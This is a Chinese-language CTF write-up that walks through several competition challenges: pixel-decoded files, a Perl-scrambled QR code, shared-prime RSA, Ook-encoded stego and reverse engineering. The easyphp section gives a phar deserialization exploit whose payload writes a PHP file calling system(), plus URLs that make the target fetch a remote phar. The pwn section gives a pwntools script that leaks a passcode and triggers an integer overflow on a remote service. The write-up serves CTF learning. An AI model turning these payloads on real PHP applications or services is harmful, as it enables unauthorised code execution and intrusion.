摸了个17,依旧是很菜,但是有证书有贴纸,我好了
fakePixel
这题挺套娃的,,,期间一直问出题人hhhh,后面还是没出来呜呜,算了做多少记录多少吧
开局一个算法代码(我已经做了注释,很容易看懂,我就不做解释)
from PIL import Image
import math
def encode(text):
length = len(text)
width = math.ceil(length**0.5)
picture = Image.new("RGB",(16659, 16659), 0x0)#16659默认为width
x,y = 0,0
for i in text:
index = ord(i) #数值转成10进制
rgb = (0, (index & 0xFF00)>> 8, index & 0xFF)
#设定rgb色,基本为(0,0,每位数据的本身十进制数)
picture.putpixel((x, y),rgb) #对x,y进行上色
if x == width - 1:#对每列逐一上色
x = 0
y += 1
else:
x += 1
return picture
if __name__ == '__main__':
with open("secret.txt",encoding = "utf-8") as f:
all_text = f.read()
picture = encode (all_text)
picture.save("FakePicture.bmp")
然后基本就是直接读颜色rgb然后转数值就完事了
from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
Image.MAX_IMAGE_PIXELS = None
picture=Image.open('FakePicture.bmp')
pix=picture.load()
width=picture.size[0]
for y in range(width):
for x in range(width):
r, g, b = pix[x, y]
print(chr(b),end='')
导出后复制丢入HxD或者winhex,可以发现结尾是KP,经典反转
a=open('1shenm','rb').read()
f=a[::-1]
b=open('test.zip','wb').write(f)
然后又是ook,解码,解压。出视频
某一帧的sb玩意
是什么maxicode,扫码,出结果
经典
好了我找不到密文了,告辞。
easyphp
代码审计人
绕就完事了,将template变量里面的值覆盖成目标值,利用phar伪协议上传最后数组方式即可绕过,撰写phar,利用
?var[template][tp1]=http://snowywar.top/shell/phar.txt&tp=tp1
上传后进行读flag即可
?var[template][tp1]=phar://uploads/xxx/xxx.html&tp=tp1
exp.php
<?php
class Template
{
public $content;
public $pattern;
public $suffix;
public function __construct()
{
$this->content = "<?php system('/readflag');";
$this->suffix = ".php";
$this->pattern = "";
}
}
$a = new Template();
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
Π
在Login函数里面有sprintf配合%s的漏洞,可以把随机数passcode泄露出来,然后进入计算pai的过程 scanf 中格式化子串里面是%llu,
但是变量类型是unsigned int类型,造成了整数溢出,溢出四个字节为3.1415926即可读出flag
from pwn import *
local = 0
binary = "./pi"
# libc_path = ''
port = "10022"
while True:
try:
if local == 1:
p = process(binary)
else:
p = remote("183.129.189.60",port)
def dbg():
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
payload = 0x40 * 'a'
p.recvuntil('Username:')
p.sendline(payload)
p.recvuntil('a' * 0x40)
password = p.recv(10)
print password
p.recvuntil('Passcode:')
p.sendline(password)
p.recvuntil('N =')
p.sendline('4632251120704552960') # 0x40490fda00000000 4632251120704552960
# gdb.attach(p,"b *$rebase(178F)")
p.interactive()
except Exception as e:
print e
continue
this is easy VH
开头创建了线程
第一个函数有反调试,通过改进程名就可以
6749d4那几个函数通过调试确定
逻辑 是先变表base64,再rc4,前12个到v17
再8个:先凯撒13位,再变表base64
再16个:先rc4,再变表base64
最后异或一组数
解了半天是fakeflag= =
过掉反调试,得到 真实得变换逻辑在402d80
也是分三段,分别是rc4,变表base64,cs13。对Vftable的变换在Start,TLSCallback_0有VirtualProtect
原来还有个短斜线
import base64
import hashlib
import os
from Crypto.Cipher import AES
# from z3 import *
print(base64.b64decode(b'mtiNnduQnN6TmdeMmNqPn6=='))
print(base64.b64encode(b'1234567890123456'))
v6 = [0]*85
v6[0] = 97
v6[1] = 98
v6[2] = 99
v6[3] = 100
v6[4] = 101
v6[5] = 102
v6[6] = 103
v6[7] = 104
v6[8] = 105
v6[9] = 106
v6[10] = 107
v6[11] = 108
v6[12] = 109
v6[13] = 110
v6[14] = 111
v6[15] = 112
v6[16] = 113
v6[17] = 114
v6[18] = 115
v6[19] = 116
v6[20] = 117
v6[21] = 118
v6[22] = 119
v6[23] = 120
v6[24] = 121
v6[25] = 122
v6[26] = 48
v6[27] = 49
v6[28] = 50
v6[29] = 51
v6[30] = 52
v6[31] = 53
v6[32] = 54
v6[33] = 55
v6[34] = 56
v6[35] = 57
v6[36] = 43
v6[37] = 47
v6[38] = 65
v6[39] = 66
v6[40] = 67
v6[41] = 68
v6[42] = 69
v6[43] = 70
v6[44] = 71
v6[45] = 72
v6[46] = 73
v6[47] = 74
v6[48] = 75
v6[49] = 76
v6[50] = 77
v6[51] = 78
v6[52] = 79
v6[53] = 80
v6[54] = 81
v6[55] = 82
v6[56] = 83
v6[57] = 84
v6[58] = 85
v6[59] = 86
v6[60] = 87
v6[61] = 88
v6[62] = 89
v6[63] = 90
v6[64] = 43
v6[65] = 47
v6[66] = 33
v6[67] = 64
v6[68] = 35
v6[69] = 36
v6[70] = 37
v6[71] = 94
v6[72] = 38
v6[73] = 42
v6[74] = 40
v6[75] = 41
v6[76] = 95
v6[77] = 43
v6[78] = 60
v6[79] = 62
v6[80] = 46
v6[81] = 91
v6[82] = 93
v6[83] = 123
v6[84] = 125
print("tab:",bytes(v6))
tab = v6
otab = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
rtab = {}
for i in range(64):
rtab[tab[i]]=ord(otab[i])
rtab[0x20]=ord('=')
def reDiyb64(b):
f = []
for i in b:
f.append(rtab[i])
return base64.b64decode(bytes(f))
target = [0x7E,0x7E,0xF4,0xA0,0x26,0x25,0x06,0x73,0x78,0x6E,0x77,0x7A,
0x78,0x6A,0x54,0x56,0x61,0x47,0x72,0x45,
0x52,0x66,0x67,0x76,0x61,0x74]
print(target[:7]) # 然后去网上解密
print(reDiyb64(bytes(target[7:7+8])))
print(reDiyb64(b'sxnwzxjT'))
print(bytes(target[15:]))# cs13
flag = 'VFtAble'+"-IsVery"+"-InTeREsting"
print(flag)
print(hashlib.md5(b'VFtAble-Very-InTeREsting').hexdigest())
rakudadou
- perl文件
- 不会perl语法于是调试尝试
- 字符串.flip用于翻转字符串
- ~运算符连接字符串
- p函数没看懂,大概是字符串平均分成3分,后面两份居多,然后按照1,3,2的顺序拼接
- flip函数没怎么看懂,但是使用了flip,也就是把字符串移位了,可以通过逆映射的方式在不用得知功能的情况下进行逆变换
- 最后要使用某些库显示二维码
import cv2
import numpy as np
import matplotlib.pyplot as plt
s = '11000000000000000000000000000011011001111111100110 11001111111111000011111111110011100111111000000111 11001100000011000011000000110011100001111110011001 11001100000011000011000000110011011001100001100000 11001111111111000011111111110011100110011110011001 11111111111111111111111111111111111001100000000001 00110000111111001111110011111100111000000111111001 00001111001111110000111111111100011110011110011000 11111100111100110011111111111100000110000001100000 11110011001111001111111111110000111110011111100111 11111111110011001111111111111111111001100001100111 11000011000011000000001100000000011111111001100110 11111111111111111111000000111111000000000001100000 11001111111111000011111100111111011110000111100000 11001100000011000011110000110000000001100111111000 11000000000000000000001111001100000000011111111110 11001100000011000011000000110011111110000111111001 11000000000000000000000000000011000110011001100110 00001100000000001100110011001100000001111001111110 11000000111111001100000011001111111000011001111111 11001100001111000000001100001100011111111110011110 11000000000000000000001100110011000111111000011000 11001100000011001111000000000000000111111000000000 11001100000011000011001111000011000111111000011110 11001111111111000011110000110011000000000110000000'
sa = s.split(' ')
print(sa)
tag = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'[:50]
rtag = 'PONMLKJIHGFEDCBAxwvutsrqponmlkjihQRSTUVWXYZabcdefg'
print(tag,rtag)
dic = {}
for i in range(len(tag)):
dic[rtag[i]]=tag[i]
ndic = {}
for i in range(len(tag)):
ndic[tag[i]]=i
rndic = {}
for i in range(len(tag)):
rndic[ndic[rtag[i]]]=ndic[tag[i]]
print(rndic)
test = ''
for i in range(len(tag)):
test+=rtag[rndic[i]]
print(test)
def reflip(s):
res = ''
for i in range(len(s)):
res+=s[rndic[i]]
return res
print(reflip(rtag))
qr = ''
qa = []
cnt = 0
while cnt<25:
tmp = sa[cnt]
tmp = reflip(tmp)
tmp = tmp.replace('1',' ',-1)
tmp = tmp.replace('0','#',-1)
qr+=tmp+'\n'
qa.append(tmp)
cnt+=1
if cnt>=25:
break
tmp = sa[cnt]
tmp = reflip(tmp)
tmp = tmp.replace('1',' ',-1)
tmp = tmp.replace('0','#',-1)
qr+=tmp+'\n'
cnt+=1
qa.append(tmp)
print(len(qa))
index = [24,23,21,20,19,17,15,14,13,11,9,8,7,5,3,0,22,18,16,12,10,6,4,2,1]
rind = {}
for i in range(len(index)):
rind[index[i]]=i
for i in range(len(qa)):
print(qa[rind[i]])
rqa = []
for i in range(len(qa)):
r = []
for i in qa[rind[i]]:
if i=='#':
r.append([0,0,0])
else :
r.append([255,255,255])
rqa.append(r)
rqa.append(r)
img = np.asarray(rqa)
plt.imshow(img)
plt.show()
asa
两次使用了相同的p,所以p是两个n的最大公约数,这样就容易求了
import gmpy2
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
n1 = 0x661d752110bcc6ee5ca33edaf244716cccce6400dfdbfd84ce6ae2d8fbbeb2f61584da7668768403b6135e7810eae9d4d8e044935f8680de5324c3fc0f9bffb01812f9d2ac9055ee8dbd17b90c5a60cb7595a82f24a075d951db3b7f913b8543ecd52b8c8464ce348c3970d511ae911e814f9ca33b8412db2730e61820f5de47
n2 = 0x9f159326c907441326c88d17eae1c6e8aaea23922c5e628a585294e379e9245644f9c249c57f54a2b83921b4adc988fecc90c00feb6936d9be1f3a5ffae951b74ffbc6fc7aa11743e4ca179a937392dacf931e820d1d83016562ff608e8c59ef7310654a09bbba4a0129f71dcb61bd9bef073bbb93bfcac4a7a2e81156dbb32d
p = gmpy2.gcd(n1,n2)
print(p)
q1 = n1//p
q2 = n2//p
e = 65537
d1 = gmpy2.invert(e,(p-1)*(q1-1))
d2 = gmpy2.invert(e,(p-1)*(q2-1))
keyc = 0xd7931796fa39cfa37c0b621c01175904206dff1d74a28369dcd6517957ed76c5eb7d4934cbeb902119f9215f9ae7926debe3abe856244b45dbb4caaa2b93dbb79a3ca1a9813e1466c49fe3c03e5462811afbf3f40ff79927f9fe3681b7f3cef34466b9a736512f4931b5026eefacbae9be6e408085a7a636c514574c3b22ffe
ivc = 0x6240740d41a539a88634726cf0a791a87e02419c3c3e00dff62eba59e81a93fd04a59109e57f64fc375b9a321583b6fa133317eb5c4e6eb1e6f6d9a0b4ae6ff0c54423718811f7956cd63b7bf9c7f8e29f48dad8f05b63b71d6c5112d91864adba0d6bb342c67aee39ccd5e2a6928a8e4ab2248d29a0c990bae821b31b39b1f3
c = 'f8559d671b720cd336f2d8518ad6eac8c405585158dfde74ced376ba42d9fe984d519dc185030ddec7b4dc240fd90fa8'
c = long_to_bytes(int(c,base=16))
key = gmpy2.powmod(keyc,d1,n1)
iv = gmpy2.powmod(ivc,d2,n2)
print(long_to_bytes(key))
key = long_to_bytes(key)
iv = long_to_bytes(iv)
aes = AES.new(key=key,iv=iv,mode=AES.MODE_CBC)
print(aes.decrypt(c))
马保国
拿到手是一张图片,首先尝试对所有的二维码解码。解出来的内容无规律,遂放弃该思路。
将压缩包后缀改为zip,用360解压打开,可以发现一张图片,将其后缀改为jpg,发现了许多不寻常的二维码,考虑在图片中隐含了信息。
可以得到压缩包的解压密码,打开之后是某某编码,写脚本转换即可
short ok编码,转换后的内容为
. . . . . . . . . . . . . . .. ! ? ! ! . ? . . . . . . . .. . . . . . . . ? . ? ! . ? .. . . . . . . ! . ! ! ! ! ! !! . ? . . . . . . . . . ! ? !! . ? . . . . . . . . ? . ? !. ? . . . . ! . ? . . . . . .. . . ! ? ! ! . ? ! ! ! ! ! !! ! ? . ? ! . ? ! . ? . . . .. . . . . ! ? ! ! . ? . . . .. . . . ? . ? ! . ? . . ! . ?. . . . . . . ! ? ! ! . ? ! !! ! ! ! ? . ? ! . ? ! ! ! ! !! ! ! ! ! ! . ? . . . . . . .. . . . . . . . ! ? ! ! . ? .. . . . . . . . . . . . . ? .? ! . ? . . . . . . . . ! . ?. . . . . . . . . ! ? ! ! . ?! ! ! ! ! ! ! ! ? . ? ! . ? !! ! ! ! ! ! ! ! ! ! . ? . . .. . . . . . . . . . ! ? ! ! .? ! ! ! ! ! ! ! ! ! ! ! ! ? .? ! . ? ! ! ! ! ! ! ! ! ! ! !! ! ! ! ! ! ! ! ! ! ! ! . . .. . ! . ? . . . . . . . . . .. . . ! ? ! ! . ? . . . . . .. . . . . . ? . ? ! . ? . . .. . . . . . . . . . . . . . .! . ? . . . . . . . . . . . .. . . ! ? ! ! . ? ! ! ! ! ! !! ! ! ! ! ! ! ! ? . ? ! . ? !! ! ! ! ! ! . . . . . . . . .. . . . ! . ? . . . . . . . .. . . . . ! ? ! ! . ? . . . .. . . . . . . . ? . ? ! . ? .. . . . . . . . . . . . . . .. . . . ! . ? . . . . . . . .. . . . . . . ! ? ! ! . ? ! !! ! ! ! ! ! ! ! ! ! ! ! ? . ?! . ? ! ! ! ! ! . ! ! ! ! ! !! . . . . . ! . . . ! . ! ! !. ? . . . . . . . . . . . . .. . ! ? ! ! . ? . . . . . . .. . . . . . . ? . ? ! . ? . .. . ! . ? . . . . . . . . . .. . . . . ! ? ! ! . ? ! ! ! !! ! ! ! ! ! ! ! ! ! ? . ? ! .? ! ! ! ! ! . . . . . . . . .! . ? . . . . . . . . . . . .. ! ? ! ! . ? . . . . . . . .. . . . ? . ? ! . ? . . . . .. . . . . . . . . ! . ? . . .. . . . . . . . . . ! ? ! ! .? ! ! ! ! ! ! ! ! ! ! ! ! ? .? ! . ? ! ! ! ! ! ! ! ! ! ! !! ! ! ! ! ! ! ! ! ! ! ! . ? .. . . . . . . . . . . . . . !? ! ! . ? . . . . . . . . . .. . . . ? . ? ! . ? . . . . .. ! . ? . . . . . . . . . . .. . . . ! ? ! ! . ? ! ! ! ! !! ! ! ! ! ! ! ! ! ? . ? ! . ?! . ! ! ! ! ! ! ! ! ! . ? . .. . . . . . . . . . . . . ! ?! ! . ? . . . . . . . . . . .. . . ? . ? ! . ? ! . ? . . .. . . . . . . . . . ! ? ! ! .? ! ! ! ! ! ! ! ! ! ! ! ! ? .? ! . ? ! ! ! ! ! ! ! ! ! ! !! ! ! ! ! ! . ? . . . . . . .. . . . . . ! ? ! ! . ? . . .. . . . . . . . . ? . ? ! . ?. . . . . . . . . . . . . . .. ! . ? . . . . . . . . . . .. . ! ? ! ! . ? ! ! ! ! ! ! !! ! ! ! ! ? . ? ! . ? ! ! ! !! ! ! ! ! ! ! ! ! ! ! . ! ! !! ! . ! ! ! ! ! . . . . . ! .! . ? . . . . . . . . . . . .. ! ? ! ! . ? . . . . . . . .. . . . ? . ? ! . ? . . . . .. . . . . . . . . . . ! . . .. . . . . . . . ! . ! ! ! ! !! ! ! ! ! ! . ? . . . . . . .. . . . . . ! ? ! ! . ? ! ! !! ! ! ! ! ! ! ! ! ? . ? ! . ?! ! ! ! ! ! ! ! ! . ? . . . .. . . . . . . . . . . . . ! ?! ! . ? . . . . . . . . . . .. . . . . ? . ? ! . ? . . . .. . . . ! . ? .
经典ook,爪巴
- 最新
- 最热
只看作者